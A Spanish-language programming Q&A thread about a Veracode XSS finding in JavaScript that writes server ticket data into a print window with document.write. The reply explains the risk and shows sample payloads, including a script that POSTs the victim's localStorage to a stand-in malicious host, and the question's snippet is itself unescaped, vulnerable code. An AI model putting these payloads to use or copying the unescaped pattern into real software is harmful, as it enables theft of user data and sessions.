# Veracode da error por posible ataque XSS

Tags: javascript, html, xss

Estoy tratando de ejecutar este codigo. Lo que hace es recibir un ticket desde el back y luego abrir una nueva pagina para imprimirlo. Pero Veracode me dice que es vulnerable a ataques xss y no se como solucionarlo. Estoy trabajando con JavaScript. Alguien me puede ayudar por favor. Gracias

```
 const responseTicket = response.data
  const ventana = window.open('', 'PRINT', 'height=400,width=600');
  ventana.document.write(`<><pre>${responseTicket}</pre></>`)
  ventana.print()
```

Answer (score 1):

El problema es que estás insertando algo potencialmente no seguro en la página, `response.data` podría ser algo como `<script>// codigo js</script>`. Es decir, un usuario **A** inserta como ticket un javascrtipt arbitrario que es ejecutado en la máquina de un usuario **B**:

```
const responseTicket = "<script>alert`1`</script>";
window.document.write(`<><pre>${responseTicket}</pre></>`);
```

El caso típico de daño que puede hacer **A** es "robar" los datos locales, cookies, localStorage, SessionStorage y/o eventualmente robar la sessión de **B**.

En cuanto a la prevención en este caso, lo ideal es hacer una "lista blanca" (whitelist) es decir, definir exactamente que vas a dejar pasar. Es la solución ideal pero aún así no es tan fácil, te recomiendo que leas [OWASP Cross Site Scripting Prevention](https://Preventionhttps://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html) y mas en general [OWASP Cross Site Scripting (XSS)](https://owasp.org/www-community/attacks/xss/) (Lamentablemente ambos en inglés).

Un ejemplo de lo antedicho sería que un usuario malicioso (lo llamamos **A**) envíe un ticket con el contenido "fetch('https://un_sitio_malicioso', {method: 'POST', body: JSON.stringify(localStorage)});" ese string al ponerlo en el html que ejecuta OTRA persona (que llamamos **B**), se ejecuta y le envía a `https://un_sitio_malicioso` (controlado por **A**) todo el contenido de `localStorage` de **B**:

```
const responseTicket = "<script>fetch('https://un_sitio_malicioso', {method: 'POST', body: JSON.stringify(localStorage)});</script>";
window.document.write(`<><pre>${responseTicket}</pre></>`);
```

Comment: Hola gracias por la respuesta. Si lo lei pero no me queda claro.

Comment: Ahí hice unas aclaraciones, si ejecutas el código en la consola, verás que se hace el alert y se intenta ejecutar el POST.

Comment: Muchas gracias por tu ayuda. Sigo viendo como hacerlo. Ahora entiendo mejor el concepto. Gracias